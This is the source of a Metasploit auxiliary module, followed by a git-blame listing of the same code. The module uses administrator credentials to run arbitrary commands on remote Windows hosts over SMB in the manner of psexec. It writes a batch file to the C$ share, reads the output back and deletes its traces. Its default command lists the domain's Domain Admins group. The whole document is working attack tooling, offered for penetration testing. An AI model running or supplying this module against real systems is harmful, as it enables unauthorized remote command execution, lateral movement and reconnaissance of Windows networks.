modules/auxiliary/admin/smb/psexec_command.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT  = Rex::Proto::SMB::Exceptions
  CONST  = Rex::Proto::SMB::Constants

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows Authenticated Administration Utility',
      'Description'    => %q{
          This module uses a valid administrator username and password to execute an
        arbitrary command on one or more hosts, using a similar technique than the "psexec"
        utility provided by SysInternals. Daisy chaining commands with '&' does not work
        and users shouldn't try it. This module is useful because it doesn't need to upload
        any binaries to the target machine.
      },

      'Author'         => [
        'Royce Davis @R3dy__ <rdavis[at]accuvant.com>',
      ],

      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
        [ 'OSVDB', '3106'],
        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
      ]
    ))

    register_options([
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
      OptString.new('RPORT', [true, 'The Target port', 445]),
      OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),
    ], self.class)

    register_advanced_options([
      OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),
      OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),
      OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),
    ], self.class)

    deregister_options('RHOST')
  end

  # This is the main controle method
  def run_host(ip)
    text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"
    bat  = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    # Try and authenticate with given credentials
    if connect
      begin
        smb_login
      rescue Rex::Proto::SMB::Exceptions::Error => autherror
        print_error("Unable to authenticate with given credentials: #{autherror}")
        return
      end
      res = execute_command(text, bat)

      if res
        for i in 0..(datastore['RETRY'])
          Rex.sleep(datastore['DELAY'])
          # if the output file is still locked then the program is still likely running
          if (exclusive_access(text))
            break
          elsif (i == datastore['RETRY'])
            print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
          end
        end
        get_output(text)
      end

      cleanup_after(text, bat)
      disconnect
    end
  end

  # Executes specified Windows Command
  def execute_command(text, bat)
    # Try and execute the provided command
    execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
    print_status("Executing the command...")
    begin
      return psexec(execute)
    rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
      print_error("Unable to execute specified command: #{e}")
      return false
    end
  end

  # Retrive output from command
  def get_output(file)
    print_status("Getting the command output...")
    output = smb_read_file(@smbshare, @ip, file)
    if output.nil?
      print_error("Error getting command output. #{$!.class}. #{$!}.")
      return
    end
    if output.empty?
      print_status("Command finished with no output")
      return
    end

    # Report output
    print_good("Command completed successfuly!")
    vprint_status("Output for \"#{datastore['COMMAND']}\":")
    vprint_line("#{output}")

    report_note(
      :rhost => datastore['RHOSTS'],
      :rport => datastore['RPORT'],
      :type => "psexec_command",
      :name => datastore['COMMAND'],
      :data => output
    )

  end

  # check if our process is done using these files
  def exclusive_access(*files)
    begin
      simple.connect("\\\\#{@ip}\\#{@smbshare}")
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
      print_status("Unable to get handle: #{accesserror}")
      return false
    end
    files.each do |file|
      begin
        print_status("checking if the file is unlocked")
        fd = smb_open(file, 'rwo')
        fd.close
      rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
        print_status("Unable to get handle: #{accesserror}")
        return false
      end
      simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
    end
    return true
  end


  # Removes files created during execution.
  def cleanup_after(*files)
    begin
      simple.connect("\\\\#{@ip}\\#{@smbshare}")
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
      print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
      return
    end
    print_status("Executing cleanup...")
    files.each do |file|
      begin
        smb_file_rm(file)
      rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
        print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
      end
    end
    left = files.collect{ |f| smb_file_exist?(f) }
    if left.any?
      print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
    else
      print_status("Cleanup was successful")
    end
  end

end
added license info 2013-03-07 00:20:02 +00:00			`##`
Fix up comment splats with the correct URI 2014-10-17 11:47:33 -05:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added license info 2013-03-07 00:20:02 +00:00			`##`
New module command.rb 2012-11-05 12:03:51 -06:00
			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
New module command.rb 2012-11-05 12:03:51 -06:00
Fix mixin usage on modules 2015-02-13 17:17:59 -06:00			`include Msf::Exploit::Remote::SMB::Client::Psexec`
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`

			`# Aliases for common classes`
			`SIMPLE = Rex::Proto::SMB::SimpleClient`
			`XCEPT = Rex::Proto::SMB::Exceptions`
			`CONST = Rex::Proto::SMB::Constants`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft Windows Authenticated Administration Utility',`
			`'Description' => %q{`
			`This module uses a valid administrator username and password to execute an`
			`arbitrary command on one or more hosts, using a similar technique than the "psexec"`
			`utility provided by SysInternals. Daisy chaining commands with '&' does not work`
			`and users shouldn't try it. This module is useful because it doesn't need to upload`
			`any binaries to the target machine.`
			`},`

			`'Author' => [`
			`'Royce Davis @R3dy__ <rdavis[at]accuvant.com>',`
			`],`

			`'License' => MSF_LICENSE,`
			`'References' => [`
			`[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '3106'],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],`
			`[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],`
			`[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]`
			`]`
			`))`

			`register_options([`
			`OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),`
			`OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),`
			`OptString.new('RPORT', [true, 'The Target port', 445]),`
			`OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),`
			`], self.class)`

			`register_advanced_options([`
			`OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),`
			`OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),`
Retab modules 2013-08-30 16:28:54 -05:00			`], self.class)`

			`deregister_options('RHOST')`
			`end`

			`# This is the main controle method`
			`def run_host(ip)`
			`text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"`
			`bat = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"`
			`@smbshare = datastore['SMBSHARE']`
			`@ip = ip`

			`# Try and authenticate with given credentials`
			`if connect`
			`begin`
			`smb_login`
			`rescue Rex::Proto::SMB::Exceptions::Error => autherror`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error("Unable to authenticate with given credentials: #{autherror}")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`res = execute_command(text, bat)`

			`if res`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`for i in 0..(datastore['RETRY'])`
			`Rex.sleep(datastore['DELAY'])`
			`# if the output file is still locked then the program is still likely running`
			`if (exclusive_access(text))`
			`break`
			`elsif (i == datastore['RETRY'])`
			`print_error("Command seems to still be executing. Try increasing RETRY and DELAY")`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00			`get_output(text)`
			`end`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`cleanup_after(text, bat)`
			`disconnect`
			`end`
			`end`

			`# Executes specified Windows Command`
			`def execute_command(text, bat)`
			`# Try and execute the provided command`
			`execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Executing the command...")`
Retab modules 2013-08-30 16:28:54 -05:00			`begin`
			`return psexec(execute)`
Fix name for exception 2016-11-15 12:14:58 -06:00			`rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e`
Resolve #6020 , Better RPC exception handling 2015-10-28 11:16:44 -05:00			`elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)`
Fix name for exception 2016-11-15 12:14:58 -06:00			`print_error("Unable to execute specified command: #{e}")`
Retab modules 2013-08-30 16:28:54 -05:00			`return false`
			`end`
			`end`

			`# Retrive output from command`
			`def get_output(file)`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Getting the command output...")`
Retab modules 2013-08-30 16:28:54 -05:00			`output = smb_read_file(@smbshare, @ip, file)`
			`if output.nil?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error("Error getting command output. #{$!.class}. #{$!}.")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`
			`if output.empty?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Command finished with no output")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`# Report output`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_good("Command completed successfuly!")`
use vprintf... 2014-10-26 09:20:32 -05:00			`vprint_status("Output for \"#{datastore['COMMAND']}\":")`
			`vprint_line("#{output}")`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00
			`report_note(`
fix msftidy warnings 2014-12-12 13:16:21 +01:00			`:rhost => datastore['RHOSTS'],`
			`:rport => datastore['RPORT'],`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`:type => "psexec_command",`
fix msftidy warnings 2014-12-12 13:16:21 +01:00			`:name => datastore['COMMAND'],`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`:data => output`
			`)`

Retab modules 2013-08-30 16:28:54 -05:00			`end`

yard doc and comment corrections for auxiliary 2015-04-03 16:12:23 +05:00			`# check if our process is done using these files`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`def exclusive_access(*files)`
Add begin-rescue blocks that prevent individual hosts from bailing out a threaded multi-host execution 2016-11-11 10:15:36 -07:00			`begin`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`simple.connect("\\\\#{@ip}\\#{@smbshare}")`
Catch the specific exception. Include the error code in the error message. 2016-11-11 10:24:05 -07:00			`rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror`
			`print_status("Unable to get handle: #{accesserror}")`
Add begin-rescue blocks that prevent individual hosts from bailing out a threaded multi-host execution 2016-11-11 10:15:36 -07:00			`return false`
			`end`
Catch the specific exception. Include the error code in the error message. 2016-11-11 10:24:05 -07:00			`files.each do \|file\|`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`begin`
			`print_status("checking if the file is unlocked")`
			`fd = smb_open(file, 'rwo')`
			`fd.close`
			`rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Unable to get handle: #{accesserror}")`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`return false`
			`end`
incoporating jvazquez feedback 2013-10-31 00:17:50 -07:00			`simple.disconnect("\\\\#{@ip}\\#{@smbshare}")`
Retab changes for PR #2134 2013-09-05 14:24:37 -05:00			`end`
			`return true`
			`end`
msftidy whitespace fixes 2016-11-11 10:28:37 -07:00

Retab modules 2013-08-30 16:28:54 -05:00			`# Removes files created during execution.`
			`def cleanup_after(*files)`
Add begin-rescue blocks that prevent individual hosts from bailing out a threaded multi-host execution 2016-11-11 10:15:36 -07:00			`begin`
			`simple.connect("\\\\#{@ip}\\#{@smbshare}")`
Catch the specific exception. Include the error code in the error message. 2016-11-11 10:24:05 -07:00			`rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror`
Use files for rescue error, because left is not available 2016-11-11 21:49:06 -07:00			`print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")`
Add begin-rescue blocks that prevent individual hosts from bailing out a threaded multi-host execution 2016-11-11 10:15:36 -07:00			`return`
			`end`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Executing cleanup...")`
Retab modules 2013-08-30 16:28:54 -05:00			`files.each do \|file\|`
			`begin`
			`smb_file_rm(file)`
			`rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
			`end`
			`left = files.collect{ \|f\| smb_file_exist?(f) }`
			`if left.any?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")`
Retab modules 2013-08-30 16:28:54 -05:00			`else`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Cleanup was successful")`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
			`end`
ran msftidy on command.rb 2012-11-06 16:33:47 -06:00
New module command.rb 2012-11-05 12:03:51 -06:00			`end`